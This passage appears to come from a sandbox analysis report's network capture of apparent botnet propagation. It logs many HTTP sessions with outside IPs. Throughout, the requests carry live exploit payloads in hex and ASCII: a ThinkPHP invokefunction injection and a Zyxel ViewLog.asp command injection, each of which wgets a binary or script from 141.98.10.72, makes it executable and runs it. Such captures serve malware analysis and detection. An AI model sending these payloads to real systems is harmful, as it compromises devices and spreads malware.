                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:48.820688009 CET399INHTTP/1.1 404 Not Found
                                                            Date: Wed, 14 Feb 2024 11:53:07 GMT
                                                            Server: Webs
                                                            X-Frame-Options: SAMEORIGIN
                                                            Cache-Control: no-cache
                                                            Content-Length: 166
                                                            Content-Type: text/html
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=60, max=99
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            824192.168.2.233706888.198.171.23480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:50.000616074 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:50.204696894 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.25.3
                                                            Date: Wed, 14 Feb 2024 08:29:50 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            825192.168.2.234197088.210.100.18280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:50.056005955 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:50.326072931 CET421INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:50 GMT
                                                            Server: Apache
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            826192.168.2.234769888.249.192.7780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:50.326426029 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            827192.168.2.234059694.131.10.78080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.081841946 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:51.305376053 CET59INHTTP/1.1 400 Bad Request
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            828192.168.2.235775485.88.129.1638080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.082922935 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            829192.168.2.235280431.136.90.518080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.090548992 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:54.099492073 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:00.242702007 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:12.272823095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:37.869389057 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            830192.168.2.233962695.85.132.1708080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.104496956 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            831192.168.2.233315694.122.95.888080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.108963013 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            832192.168.2.234174662.29.55.868080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.109078884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            833192.168.2.233770662.29.34.2228080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.110589027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            834192.168.2.235396694.123.87.1728080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.110913038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            835192.168.2.234395631.200.70.1868080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.119127989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            836192.168.2.233839494.140.0.2128080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.199305058 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            837192.168.2.233990831.136.246.1288080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.302757978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:51.987673998 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:53.331491947 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:56.147175074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:01.522347927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:12.272871017 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:33.773859024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:16.775836945 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            838192.168.2.235358631.136.229.1688080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.302927971 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:51.987667084 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:53.331528902 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
